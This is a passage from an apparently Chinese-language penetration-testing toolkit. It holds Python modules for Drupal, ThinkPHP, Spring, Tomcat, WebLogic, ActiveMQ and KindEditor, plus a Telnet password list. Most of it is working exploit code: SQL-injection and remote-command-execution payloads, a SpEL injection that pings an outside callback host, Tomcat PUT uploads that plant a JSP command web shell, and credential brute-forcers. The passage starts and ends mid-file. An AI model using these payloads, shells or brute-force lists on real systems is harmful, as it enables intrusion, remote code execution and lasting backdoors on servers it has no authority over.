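    # %23 is the '#' that comments out the rest of the generated SQL.
    data = 'pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0,concat(0xa,user()),0)%23]=bob&name[0]=a'
    try:
        r = requests.post(url, data=data, headers=headers, verify=False, timeout=10)
    except requests.exceptions.RequestException as exc:
        print('[-]请求出错:', type(exc).__name__)
    else:
        # updatexml() surfaces the injected string in MySQL's XPATH error.
        # 0xa is a newline, so user() follows the opening quote after some
        # whitespace.  Entities are decoded first because Drupal HTML-escapes
        # the quote characters in the message.  This replaces slicing a fixed
        # character window out of the third <li>, which broke on any theme.
        body = html.unescape(r.text)
        m = re.search(r"XPATH syntax error:\s*'\s*([^']+)'", body)
        print('--------------------')
        if m:
            print('[+]存在漏洞,注入结果(user()):' + m.group(1).strip())
        else:
            print('[-]响应中未发现注入结果,状态码:', r.status_code)
        print('--------------------')
    print('[+]检测结束-Drupal < 7.32 “Drupalgeddon” SQL注入漏洞(CVE-2014-3704)。[+]')
    print('\n')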
32 |
33 |
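if __name__ == "__main__":
    import sys

    # attack() takes the target URL; the bare attack() call raised TypeError.
    if len(sys.argv) != 2:
        sys.exit(f"usage: {sys.argv[0]} <target-url>")
    attack(sys.argv[1])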
36 |
--------------------------------------------------------------------------------
/weblogic/Common_page.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import requests
3 |
4 | '''
5 | Usage:
6 | moon.py -u weblogic http://127.0.0.1:8080
7 | 用来查看weblogic常见的4个页面
8 | '''
9 |
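def attack(URL):
    """Report which of four well-known WebLogic endpoints answer HTTP 200.

    The paths are the admin console login form, the WLS-WSAT and async
    web-service endpoints, and the ws_utc test client.  A 200 only says the
    path is served; the body length is printed alongside so a catch-all 200
    error page can be told apart by eye.

    Args:
        URL: Base URL, e.g. ``http://127.0.0.1:7001``.

    Returns:
        None.  Findings are printed.
    """
    paths = (
        '/console/login/LoginForm.jsp',
        '/wls-wsat/CoordinatorPortType',
        '/_async/AsyncResponseService',
        '/ws_utc/config.do'
    )

    print('[+]开始检测-Weblogic-common_page。[+]')
    user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
    headers = {"User-Agent": user_agent}
    for path in paths:
        url = URL + path
        try:
            verify_response = requests.get(url, headers=headers, timeout=10)
        except requests.exceptions.RequestException as exc:
            # One unreachable path should not end the loop; report and move on.
            print("[-]访问页面出错!", url, type(exc).__name__)
            continue

        if verify_response.status_code == 200:
            # Length is a hint against sites that serve a uniform 200 "not
            # found" page for every path.
            print('[*]页面返回状态码:' + str(verify_response.status_code) + ' ' + '页面返回大小为:' + str(len(verify_response.text)) + ' ' + url)
        else:
            print('未发现页面:' + url)
    print('[+]检测结束-Weblogic-common_page。[+]')
    print('\n')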
38 |
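if __name__ == "__main__":
    import sys

    # attack() takes the target URL; the bare attack() call raised TypeError.
    if len(sys.argv) != 2:
        sys.exit(f"usage: {sys.argv[0]} <target-url>")
    attack(sys.argv[1])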
41 |
--------------------------------------------------------------------------------
/thinkphp/thinkphp5_x_rce.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import requests
3 | from bs4 import BeautifulSoup
4 |
5 | '''
6 | moon.py -u thinkphp http://xxxx.xxxx.xxxx.xxxx:xx
7 | ThinkPHP是一款运用极广的PHP开发框架。其版本5中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。
8 | 直接访问http://your-ip:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1,即可执行phpinfo:
9 | '''
10 |
11 |
def attack(url):
    """Probe ThinkPHP 5.x for the controller-name RCE by invoking phpinfo().

    Requests ``index.php?s=/Index/\\think\\app/invokefunction`` with
    ``call_user_func_array('phpinfo', [-1])``.  A hit is a 500 response whose
    body contains both 'PHP' and 'System '; the first ``<h1>`` (the phpinfo
    banner with the PHP version) is then printed.

    Args:
        url: Base URL, e.g. ``http://host:port`` (no trailing slash).

    Returns:
        None.  Findings are printed.
    """
    print('[+]开始检测 thinkphp5.x_rce !')
    probe = url + r'/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1'
    try:
        resp = requests.get(probe, verify=False, timeout=10)
    except Exception:
        print('[-]访问漏洞页面失败,未发现该漏洞!')
        print('\n')
        return

    executed = (resp.status_code == 500
                and 'PHP' in resp.text
                and 'System ' in resp.text)
    if not executed:
        print('[-]访问漏洞页面失败,未发现该漏洞:', probe, resp.status_code)
        print('\n')
        return

    print('[+]phpinfo成功执行:', probe)
    try:
        page = BeautifulSoup(resp.content, "lxml")
        print('[+]获取到的php版本如下:')
        print(page.find_all('h1')[0].get_text())
    except Exception:
        print('[-]获取数据出错!请自行访问页面判断.')
    else:
        print('[+]漏洞检测结束,存在 thinkphp5.x_rce !')
    print('\n')
35 |
36 |
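if __name__ == "__main__":
    import sys

    # attack() takes the target URL; the bare attack() call raised TypeError.
    if len(sys.argv) != 2:
        sys.exit(f"usage: {sys.argv[0]} <target-url>")
    attack(sys.argv[1])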
39 |
--------------------------------------------------------------------------------
/spring_vuln/CVE_2018_1273.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import requests
3 | import random
4 |
5 | '''
6 | moon.py -u spring http://xxxx.xxxx.xxxx.xxxx:xx
7 | 这里利用脚本针对的是spring官方的web样例中的注册页面,实际中未必适用
8 | '''
9 |
10 |
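def attack(url, *, oob_domain='e7wqoz.ceye.io'):
    """Test Spring Data Commons for CVE-2018-1273 via an out-of-band callback.

    If ``/users`` answers 200 (the Spring sample registration page), a
    ``username[...]`` form field carrying a SpEL expression is posted that
    runs ``ping <marker>_CVE_2018_1273.<oob_domain>`` on the server.  The
    check cannot see the result: confirmation is a DNS/HTTP hit for the
    marker in the callback service's log.

    Args:
        url: Base URL, e.g. ``http://host:port``.
        oob_domain: Callback domain that YOU control.  The default is the
            original author's ceye.io subdomain, so callbacks sent there are
            invisible to you and disclose the target host to a third party;
            always pass your own collaborator/DNS logger domain.

    Returns:
        None.  The marker to look for is printed.
    """
    URL1 = url + '/users'
    try:
        re = requests.get(URL1, verify=False, timeout=5)
    except requests.exceptions.RequestException as exc:
        print('Some error!', type(exc).__name__)
        return

    if re.status_code != 200:
        print('[-]未发现漏洞页面:', URL1, re.status_code)
        return

    print('[+]存在风险页面,开始检测:', URL1)
    URL2 = url + '/users?page=&size=5'
    headers = {"User-Agent": 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36',
               "Referer": URL1,
               "Content-Type": 'application/x-www-form-urlencoded'
               }
    # Per-run marker so the callback can be tied to this scan.
    randomint = random.randint(100000, 999999)
    callback = f"{randomint}_CVE_2018_1273.{oob_domain}"
    # NOTE: on Linux `ping` without -c keeps running on the target until it
    # is killed; the command is kept as-is because only the name resolution
    # is needed for the callback.
    data = f'username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("ping {callback}")]=&password=&repeatedPassword='
    try:
        re1 = requests.post(URL2, data=data, headers=headers, timeout=10)
    except requests.exceptions.RequestException as exc:
        print('[-]执行payload出错!', type(exc).__name__)
    else:
        print('一般执行成功返回值为500,此次返回值为:', re1.status_code)
        print('此处利用ceye来确认漏洞,请登录相关账户进行确认:', f" {callback}")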
35 |
36 |
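if __name__ == "__main__":
    import sys

    # attack() takes the target URL; the bare attack() call raised TypeError.
    if len(sys.argv) != 2:
        sys.exit(f"usage: {sys.argv[0]} <target-url>")
    attack(sys.argv[1])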
39 |
--------------------------------------------------------------------------------
/bf_dicts/TELNET-passwd.txt:
--------------------------------------------------------------------------------
1 | 123
2 | test
3 | admin
4 | cisco
5 | netadmin
6 | private
7 | 1234
8 | root
9 | super
10 | router
11 | public
12 | pento
13 | password
14 | 123456
15 | sysadm
16 | default
17 | qwe!@#
18 | switch
19 | backdoor
20 | recovery
21 | secure
22 | anicust
23 | d.e.b.u.g
24 | ADTRAN
25 | installer
26 | surt
27 | NetICs
28 | adminttd
29 | D-Link
30 | tech
31 | private
32 | synnet
33 | adtran
34 | hello
35 | security
36 | guest
37 | smile
38 | support
39 | PASSWORD
40 | changeme2
41 | ascend
42 | netopia
43 | echo
44 | pass
45 | corecess
46 | Manager
47 | secret
48 | BRIDGE
49 | atc123
50 | Password
51 | superuser
52 | 123456
53 | emradmin
54 | 12345678
55 | 123321
56 | |+_)(
57 | Admin123
58 | 88888888
59 | 66666666
60 | 111111
61 | guest
62 | test123
63 | master
64 | admin
65 | root
66 | 11111111
67 | 000000
68 | 8888
69 | 6666
70 | 123!@#
71 | 00000000
72 | 1234567
73 | aaaaaa
74 | 654321
75 | 999999
76 | 222222
77 | password
78 | abcdefg
79 | woaini
80 | iloveyou
81 | exit
82 | 99999999
83 | 333333
84 | 444444
85 | 555555
86 | 999999
87 | 000000
88 | 00000000
89 | 6543210
90 | 111222
91 | asdfghjkl
92 | abc123
93 | 666888
94 | zzzzzz
95 | abcd1234
96 | Guest123
97 | 1234
98 | 12345
99 | ab
100 | abcd
101 | abcde
102 | abcdef
103 | abcdefg
104 | abcdefgh
105 | abcdefghi
106 | Admin123
107 | 123qwe
108 | qazwsx
109 | qweasd
110 | asdfjkl;
111 | `1234567890-=
112 | 1234567890-=
113 | !@#$%^&*()_+
114 | ~!@#$%^&*()_+
115 | qwe!@#123
116 |
--------------------------------------------------------------------------------
/tomcat/tomcat_weakpasswd.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import requests
3 | import base64
4 | import urllib3
5 |
6 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
7 | '''
8 | Usage:
9 | moon.py -u tomcat http://127.0.0.1:8080
10 | 爆破tomcat用户名账户密码。
11 | '''
12 |
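def attack(URL):
    """Try a small built-in credential list against the Tomcat Manager.

    Every account/password pair is sent as HTTP Basic auth to
    ``/manager/html``; a 200 whose body carries the Manager title is reported
    as a weak password, a 401 as a wrong guess and a 403 separately (see the
    comment in the loop).

    Caution: the stock server.xml wraps the realm in ``LockOutRealm`` (five
    failures lock an account for five minutes by default -- verify on the
    target).  With five passwords per account this list sits right at that
    threshold, so a locked account answers 401 even to the right password.

    Args:
        URL: Base URL, e.g. ``http://127.0.0.1:8080``.

    Returns:
        None.  Findings are printed.
    """
    print('[+]开始检测-Tomcat-weak_pawsswd漏洞。[+]')
    accounts = ['admin', 'tomcat', 'role1', 'manager', 'both']
    passwds = ['123456', '1234', '12345678', 'admin', 'tomcat']
    # Request pieces that do not change between attempts are built once.
    url = URL + '/manager/html'
    user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
    headers = {"User-Agent": user_agent}
    pairs = [(account, passwd) for account in accounts for passwd in passwds]
    for account, passwd in pairs:
        txt = account + ':' + passwd
        try:
            # requests builds "Authorization: Basic <base64(user:pass)>" from
            # the tuple, the same header the manual encoding produced.
            r = requests.get(url, headers=headers, auth=(account, passwd), verify=False, timeout=10)
        except requests.exceptions.RequestException as exc:
            # The service is unreachable; further guesses are pointless.
            print('[-]访问管理页面出错', type(exc).__name__)
            break
        if r.status_code == 200 and 'Tomcat Web Application Manager' in r.text:
            print('[+]发现弱口令' + txt)
        elif r.status_code == 401:
            print('账户密码错误:', txt)
        elif r.status_code == 403:
            # 403 usually means the login was accepted but the user lacks the
            # manager-gui role, or an address filter (RemoteAddrValve) blocks
            # the client; either way it is worth noting rather than "error".
            print('[!]返回403,账户可能有效但无manager-gui权限或被地址过滤:', txt)
        else:
            print('[-]爆破密码出错。', r.status_code)
    print('[+]检测结束-Tomcat-weak_pawsswd漏洞。[+]')
    print('\n')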
39 |
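if __name__ == "__main__":
    import sys

    # attack() takes the target URL; the bare attack() call raised TypeError.
    if len(sys.argv) != 2:
        sys.exit(f"usage: {sys.argv[0]} <target-url>")
    attack(sys.argv[1])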
42 |
--------------------------------------------------------------------------------
/thinkphp/thinkphp_before5_0_23_rce.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import requests
3 | from bs4 import BeautifulSoup
4 |
5 | '''
6 | moon.py -u thinkphp http://xxxx.xxxx.xxxx.xxxx:xx
7 | ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。
8 |
9 | POST /index.php?s=captcha HTTP/1.1
10 | Host: localhost
11 | Accept-Encoding: gzip, deflate
12 | Accept: */*
13 | Accept-Language: en
14 | User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
15 | Connection: close
16 | Content-Type: application/x-www-form-urlencoded
17 | Content-Length: 72
18 |
19 | _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id
20 | '''
21 |
22 |
def attack(url):
    """Probe ThinkPHP < 5.0.23 for the ``_method`` request-override RCE.

    Posts ``_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls``
    to ``index.php?s=captcha``; on a vulnerable build the ``ls`` output ends
    up in the response.  A hit is a 200 whose body contains 'System Error';
    the first 80 characters of the body are then printed.

    Args:
        url: Base URL, e.g. ``http://host:port`` (no trailing slash).

    Returns:
        None.  Findings are printed.
    """
    print('[+]开始检测 thinkphp_before5.0.23_rce !')
    probe = url + r'/index.php?s=captcha'
    form = {
        '_method': '__construct',
        'filter[]': 'system',
        'method': 'get',
        'server[REQUEST_METHOD]': 'ls',
    }
    try:
        resp = requests.post(probe, data=form, verify=False, timeout=10)
    except Exception:
        print('[-]访问漏洞页面失败,未发现该漏洞!')
        print('\n')
        return

    if resp.status_code != 200 or 'System Error' not in resp.text:
        print('[-]访问漏洞页面失败,未发现该漏洞', probe, resp.status_code)
        print('\n')
        return

    print('[+]命令成功执行,获取到的目录如下:')
    try:
        print(resp.text[:80])
    except Exception:
        print('[-]获取数据出错!请自行访问页面判断.')
    else:
        print('[+]漏洞检测结束,存在 thinkphp_before5.0.23_rce !')
    print('\n')
45 |
46 |
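if __name__ == "__main__":
    import sys

    # attack() takes the target URL; the bare attack() call raised TypeError.
    if len(sys.argv) != 2:
        sys.exit(f"usage: {sys.argv[0]} <target-url>")
    attack(sys.argv[1])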
49 |
--------------------------------------------------------------------------------
/tomcat/CVE_2017_12615.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import sys
3 | import requests
4 | import time
5 |
6 | '''
7 | Usage:
8 | moon.py -u tomcat http://127.0.0.1:8080
9 | shell: http://127.0.0.1:8080/T68t8YT86.jsp?pwd=fff&cmd=whoami  (文件名固定为 T68t8YT86.jsp,与下方代码一致)
10 | 影响范围:Linux/Windows Tomcat: 7.0.0 to 7.0.79 - 官网数据
11 | 成因:Tomcat配置了可写(readonly=false),导致我们可以往服务器写文件
12 | 最好的解决方式是将 conf/web.xml 中对于 DefaultServlet 的 readonly 设置为 true
13 | '''
14 |
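def attack(URL):
    """Check Tomcat for CVE-2017-12615 (JSP upload via PUT, readonly=false).

    A JSP is PUT to ``/T68t8YT86.jsp/`` -- the trailing slash is the CVE's
    path trick that lets the DefaultServlet write the file -- and then
    fetched without the slash; a 200 containing the marker text means the
    upload worked.  The uploaded page is a command shell protected only by
    ``pwd=fff`` and stays on the target after a positive result: remove it
    once the finding is documented.

    Args:
        URL: Base URL, e.g. ``http://127.0.0.1:8080``.

    Returns:
        None.  Findings are printed.
    """
    print('[+]开始检测-Tomcat-CVE-2017-12615。[+]')
    url = URL + '/T68t8YT86.jsp/'
    user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
    headers = {"User-Agent": user_agent}
    # Java string literals cannot span lines.  The first out.print("...") was
    # written with a real newline between the quotes, so the uploaded JSP
    # could not compile on the server; it now matches the CVE-2017-12617
    # sibling's out.print("").
    data = """CVE-2017-12615
<%
if("fff".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("");
    }
%>"""
    try:
        put_response = requests.put(url, headers=headers, data=data, timeout=10)
        time.sleep(2)
        verify_response = requests.get(url[:-1], headers=headers, timeout=10)
    except requests.exceptions.RequestException as exc:
        print('[-]请求出错:', type(exc).__name__)
        print("未发现-Tomcat-CVE-2017-12615。")
    else:
        if verify_response.status_code == 200 and 'CVE-2017-12615' in verify_response.text:
            print('存在-Tomcat-CVE-2017-12615!!!')
            print('shell: ' + url[:-1] + '?pwd=fff&cmd=whoami')
        else:
            # str + int raised TypeError here before and the bare except
            # swallowed it, hiding the actual status codes.
            print('访问shell地址:' + str(verify_response.status_code), 'PUT返回:', put_response.status_code)
            print("未发现-Tomcat-CVE-2017-12615。")
    print('[+]检测结束-Tomcat-CVE-2017-12615。[+]')
    print('\n')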
47 |
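if __name__ == "__main__":
    # attack() takes the target URL; the bare attack() call raised TypeError.
    if len(sys.argv) != 2:
        sys.exit(f"usage: {sys.argv[0]} <target-url>")
    attack(sys.argv[1])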
--------------------------------------------------------------------------------
/weblogic/weblogic_weakpasswd.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import requests
3 |
4 |
5 | '''
6 | Usage:
7 | moon.py -u weblogic http://127.0.0.1:7001
8 | 爆破weblogic用户名账户密码。
9 | '''
10 |
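def attack(URL):
    """Try a built-in list of default/weak credentials against the WebLogic
    console login (``/console/j_security_check``).

    A failed login bounces back to the login form, whose body carries the
    'Oracle WebLogic Server Administration Console' title; a successful one
    lands on the console home page, whose title ends in 'WLS Console'.  That
    title also embeds the domain name, so the previous exact match on
    'Home Page - base_domain - WLS Console' only worked for a domain that was
    literally named base_domain.

    Caution: WebLogic's default security realm locks an account after a
    small number of failed logins (the default lockout threshold is 5
    failures in 10 minutes -- verify on the target).  Fifteen passwords per
    account will trip that, so a correct password late in the list can be
    missed and the admin account locked.  The loop stops at the first hit.

    Args:
        URL: Base URL of the console host, e.g. ``http://127.0.0.1:7001``.

    Returns:
        None.  Findings are printed.
    """
    print('[+]开始检测-weblogic-weak_pawsswd漏洞。[+]')

    accounts = ['guest', 'WebLogic', 'weblogic', 'Oracle@123', 'system', 'Administrator', 'admin', 'security', 'joe', 'wlcsystem', 'wlpisystem', 'portaladmin', 'mary']
    passwds = ['guest', 'weblogic1', 'WebLogic', 'weblogic', 'Oracle@123', 'password', 'system', 'Administrator', 'admin', 'security', 'joe', 'wlcsystem', 'wlpisystem', 'passwd', 'portaladmin']
    # Request pieces that do not change between attempts are built once.
    url = URL + '/console/j_security_check'
    user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
    headers = {"User-Agent": user_agent}
    pairs = [(account, passwd) for account in accounts for passwd in passwds]
    found = False
    for account, passwd in pairs:
        data = {'j_username': account, 'j_password': passwd, 'j_character_encoding': 'UTF-8'}
        try:
            r = requests.post(url, headers=headers, data=data, verify=False, timeout=10)
        except requests.exceptions.RequestException as exc:
            # The host is unreachable: stop instead of printing "finished"
            # and then carrying on with the remaining guesses.
            print('[-]访问weblogic登录页面出错,漏洞检测结束!', type(exc).__name__)
            print('\n')
            return
        if 'Oracle WebLogic Server Administration Console' in r.text:
            continue  # back on the login form: wrong credentials
        if 'WLS Console' in r.text:
            print('登录页面' + url)
            print('[+]发现弱口令:' + account + ' ' + passwd + '漏洞检测结束!')
            found = True
            break
    if not found:
        print('[-]检测结束未发现weblogic-weak_pawsswd弱口令。[-]')
    print('\n')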
42 |
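if __name__ == "__main__":
    import sys

    # attack() takes the target URL; the bare attack() call raised TypeError.
    if len(sys.argv) != 2:
        sys.exit(f"usage: {sys.argv[0]} <target-url>")
    attack(sys.argv[1])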
--------------------------------------------------------------------------------
/tomcat/CVE_2017_12617.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 |
3 | import string
4 | from random import *
5 | import requests
6 | import urllib3
7 |
8 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
9 |
10 | '''
11 | Usage:
12 | moon.py -u tomcat http://127.0.0.1:8080
13 | shell: http://127.0.0.1:8080/<随机文件名>.jsp?pwd=fff&cmd=whoami  (文件名由 gen_shell() 随机生成,实际地址见检测输出)
14 | '''
15 |
def gen_shell():
    """Return a random ``.jsp`` file name for the uploaded shell.

    The stem is 4 to 12 ASCII letters/digits; a fresh name per run avoids
    colliding with (or overwriting) a file from an earlier scan.

    Returns:
        A file name such as ``aB3xq9.jsp``.
    """
    shortest, longest = 4, 12
    alphabet = string.ascii_letters + string.digits
    stem_length = randint(shortest, longest)
    stem = "".join([choice(alphabet) for _ in range(stem_length)])
    return f"{stem}.jsp"
22 |
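def construct_put(url, f):
    """PUT a JSP command shell to ``url``/``f``/ and report whether it landed.

    The trailing slash is the CVE-2017-12617 path trick that makes Tomcat's
    DefaultServlet store the body as ``f``.  Tomcat answers 201 when the file
    is created and 204 when an existing file of that name was overwritten;
    both mean the write succeeded.  The shell is guarded only by ``pwd=fff``
    and remains on the target -- delete it once the finding is documented.

    Args:
        url: Base URL, e.g. ``http://127.0.0.1:8080``.
        f: File name to write, e.g. from ``gen_shell()``.

    Raises:
        requests.RequestException: propagated to the caller on network errors.
    """
    evil = """CVE-2017-12617
<%
if("fff".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("");
    }
%>"""
    headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
    target = str(url) + '/' + str(f)
    req = requests.put(target + "/", data=evil, headers=headers, verify=False, timeout=10)
    if req.status_code in (201, 204):
        print('发现-Tomcat-CVE-2017-12617!!!')
        print('Shell地址:' + target + '?pwd=fff&cmd=whoami')
    else:
        print('未发现-Tomcat-CVE-2017-12617。', req.status_code)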
47 |
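def attack(URL):
    """Run the CVE-2017-12617 PUT-upload check against ``URL``.

    Generates a random shell name and hands it to ``construct_put``; network
    errors are reported instead of being swallowed by a bare except.

    Args:
        URL: Base URL, e.g. ``http://127.0.0.1:8080``.

    Returns:
        None.  Findings are printed.
    """
    print('[+]开始检测-Tomcat-CVE-2017-12617。[+]')
    shell_name = gen_shell()
    try:
        construct_put(URL, shell_name)
    except requests.exceptions.RequestException as exc:
        print('shell上传错误。', type(exc).__name__)
    print('[+]检测结束-Tomcat-CVE-2017-12617。[+]')
    print('\n')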
58 |
59 |
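if __name__ == '__main__':
    import sys

    # attack() takes the target URL; the bare attack() call raised TypeError.
    if len(sys.argv) != 2:
        sys.exit(f"usage: {sys.argv[0]} <target-url>")
    attack(sys.argv[1])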
62 |
--------------------------------------------------------------------------------
/activemq_vuln/ActiveMQ_uploadfile_cve_2016_3088.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import requests
3 | import string
4 | from random import *
5 | import time
6 |
7 |
8 | '''
9 | Usage:
10 | moon.py -u activemq http://xx.xx.xx.xx:xxxx
11 | CVE-2016-3088
12 | 影响范围:Apache ActiveMQ 5.0.0 - 5.13.2 在5.12.x~5.13.x已默认关闭 5.14彻底删除相关文件
13 | 简介:ActiveMQ的web控制台分三个应用,admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是储存文件的接口;admin和api都需要登录后才能使用,fileserver无需登录。fileserver是一个RESTful API接口,我们可以通过GET、PUT、DELETE等HTTP请求对其中存储的文件进行读写操作,其设计目的是为了弥补消息队列操作不能传输、存储二进制文件的缺陷。在5.12.x~5.13.x版本中,已经默认关闭了fileserver这个应用(你可以在conf/jetty.xml中开启之);在5.14.0版本以后,彻底删除了fileserver应用。
14 | 漏洞原理:ActiveMQ 中的 FileServer 服务允许用户通过 HTTP PUT 方法上传文件到指定目录,构造PUT请求上传 webshell 到 fileserver 目录,然后通过 Move 方法将其移动到有执行权限的 admin/ 目录。这里移动文件需要具有相关权限,因此要想拿shel需要有activemq的账户和密码。
15 | 这里只测试上传这一步看看是否可行
16 | '''
17 |
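def attack(URL):
    """Test the ActiveMQ ``/fileserver/`` PUT upload (CVE-2016-3088).

    A randomly named ``.txt`` holding a marker string is PUT under
    ``/fileserver/`` and read back; a 200 containing the marker means the
    upload works.  Only the upload step is exercised -- turning it into code
    execution needs a MOVE into a web-executable directory, which requires
    credentials (see the module docstring).  A positive result leaves the
    marker file on the target; remove it afterwards.

    Args:
        URL: Base URL of the web console, e.g. ``http://host:port``.

    Returns:
        None.  Findings are printed.
    """
    print('[+]开始检测-ActiveMQ任意文件写入漏洞(CVE-2016-3088)。[+]')
    filename = gen_shell()
    url = URL + '/fileserver/' + filename + '.txt'
    user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
    headers = {"User-Agent": user_agent}
    data = """CVE-2016-3088-file_upload_test"""
    try:
        requests.put(url, headers=headers, data=data, timeout=10)
        time.sleep(2)
        verify_response = requests.get(url, headers=headers, timeout=10)
    except requests.exceptions.RequestException as exc:
        print('[-]请求出错:', type(exc).__name__)
        print("未发现-ActiveMQ任意文件写入漏洞(CVE-2016-3088)。")
    else:
        if verify_response.status_code == 200 and 'CVE-2016-3088-file_upload_test' in verify_response.text:
            print('文件上传成功!!!')
            print('上传文件地址: ' + url)
        else:
            # str + int raised TypeError here before and the bare except
            # turned it into a false "not vulnerable" message.
            print('访问上传文件地址:' + str(verify_response.status_code))
            print("未能成功上传文件。")
    print('[+]检测结束-ActiveMQ任意文件写入漏洞(CVE-2016-3088)。[+]')
    print('\n')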
def gen_shell():
    """Return a random file stem of 4 to 12 ASCII letters/digits.

    Used for the upload test file name so repeated scans do not collide.

    Returns:
        The stem only (no extension), e.g. ``q7Lm2x``.
    """
    shortest, longest = 4, 12
    alphabet = string.ascii_letters + string.digits
    picked = [choice(alphabet) for _ in range(randint(shortest, longest))]
    return "".join(picked)
45 |
46 |
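if __name__ == "__main__":
    import sys

    # attack() takes the target URL; the bare attack() call raised TypeError.
    if len(sys.argv) != 2:
        sys.exit(f"usage: {sys.argv[0]} <target-url>")
    attack(sys.argv[1])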
49 |
--------------------------------------------------------------------------------
/kindeditor/kindeditor_under_4_1_5_fileupload.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import sys
3 | import requests
4 | import time
5 |
6 | '''
7 | Usage:
8 | moon.py -u kindeditor http://127.0.0.1:8080/kindeditor  (kindeditor 目录的地址,末尾不带斜杠)
9 | 影响:kindeditor<=4.1.5 文件上传漏洞 可上传txt和html,用作钓鱼或者跳转博彩网站
10 | 检测方式:这里采用版本判断和查看上传文件的方式确认漏洞是否存在
11 | 首先查询编辑器版本,如果在4.1.5版本之下,且存在相应的上传文件,则认为漏洞存在
12 | '''
13 |
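def attack(URL):
    """Fingerprint a KindEditor install and look for its upload handlers.

    Two independent signals are printed: the first 40 bytes of
    ``kindeditor-min.js`` (where the version banner sits) and which of the
    four ``upload_json.*`` handlers answer 200.  A handler being present is
    not proof of the <=4.1.5 upload flaw -- confirm the version, and ideally
    an actual upload, before reporting.

    Args:
        URL: URL of the KindEditor directory, e.g. ``http://host/kindeditor``
            (no trailing slash).

    Returns:
        None.  Findings are printed.
    """
    print('[+]开始检测-kindeditor<=4.1.5文件上传漏洞。[+]')
    user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
    headers = {"User-Agent": user_agent}

    # Version banner.
    url1 = URL + '/kindeditor-min.js'
    print('开始检查kindeditor版本,kindeditor<=4.1.5存在文件上传漏洞:')
    try:
        verify_response = requests.get(url1, headers=headers, timeout=10)
    except requests.exceptions.RequestException as exc:
        print('获取版本失败。', type(exc).__name__)
    else:
        if verify_response.status_code == 200:
            # Decode so the banner prints as text rather than a bytes repr.
            print('此kindeditor的版本为:', verify_response.content[:40].decode('utf-8', 'replace'))
        else:
            print('未发现获取版本的文件:', verify_response.status_code)
        print('-----------------------------------------------------')

    # Upload handlers, one per server-side language KindEditor ships with.
    handlers = (
        '/asp/upload_json.asp',
        '/asp.net/upload_json.ashx',
        '/jsp/upload_json.jsp',
        '/php/upload_json.php'
    )
    for path in handlers:
        url = URL + path
        try:
            verify_response = requests.get(url, headers=headers, timeout=10)
        except requests.exceptions.RequestException as exc:
            # One failing path should not stop the others from being checked.
            print("Someerror!", url, type(exc).__name__)
            continue
        if verify_response.status_code == 200:
            print('存在此页面:' + url + ' ' + str(verify_response.status_code))
        else:
            print('未发现此页面:' + url + ' ' + str(verify_response.status_code))
    print('[+]检测结束-kindeditor<=4.1.5文件上传漏洞。[+]')
    print('\n')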
58 |
if __name__ == "__main__":
    # Stand-alone entry point with an empty base URL: the requests inside
    # attack() then go to bare paths such as '/kindeditor-min.js' (no scheme),
    # which requests cannot send, so every step reports failure.  Use moon.py,
    # which passes the real target in.
    attack('')
61 |
62 |
63 |
--------------------------------------------------------------------------------
/tomcat/example_vulnerability.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import requests
3 |
4 | '''
5 | Usage:
